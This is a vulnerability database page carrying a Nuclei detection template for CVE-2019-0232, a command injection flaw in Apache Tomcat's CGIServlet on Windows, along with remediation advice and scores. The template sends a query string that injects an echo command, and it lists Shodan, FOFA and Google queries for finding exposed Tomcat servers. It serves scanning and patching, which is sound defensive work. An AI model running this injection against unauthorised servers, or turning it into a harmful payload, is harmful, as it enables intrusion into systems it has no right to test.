Vulners
Lucene search
Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
10
id: CVE-2019-0232
info:
name: Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
author: DhiyaneshDk
severity: high
description: |
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
impact: |
Attackers can execute arbitrary system commands on Windows systems when CGI Servlet is enabled with enableCmdLineArguments, leading to complete server compromise.
remediation: |
Upgrade to Tomcat 9.0.18, 8.5.40, 7.0.94 or later, and ensure enableCmdLineArguments is disabled.
reference:
- http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2019/May/4
- https://access.redhat.com/errata/RHSA-2019:1712
- https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
- https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2019-0232
cwe-id: CWE-78
epss-score: 0.94221
epss-percentile: 0.99927
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
vendor: apache
product: tomcat
shodan-query:
- http.html:"apache tomcat"
- http.title:"apache tomcat"
- http.html:"jk status manager"
- cpe:"cpe:2.3:a:apache:tomcat"
fofa-query:
- body="jk status manager"
- body="apache tomcat"
- title="apache tomcat"
google-query: intitle:"apache tomcat"
tags: cve,cve2019,packetstorm,seclists,apache,tomcat,vkev,vuln
variables:
sid: "{{rand_text_alpha(10)}}"
http:
- raw:
- |
GET /?&echo+{{sid}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{sid}}"
- type: word
negative: true
part: body
words:
- "echo {{sid}}"
- "echo+{{sid}}"
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4a0a0047304502204c8e485962b7667d592f22676a54b1c572a8d6b4891dfc73bff7932114e300a0022100c792f0335f48a48f8107e779572b550a68dee73733b88a2d1cba7afe321b1253:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 38.1
CVSS 29.3
EPSS0.94221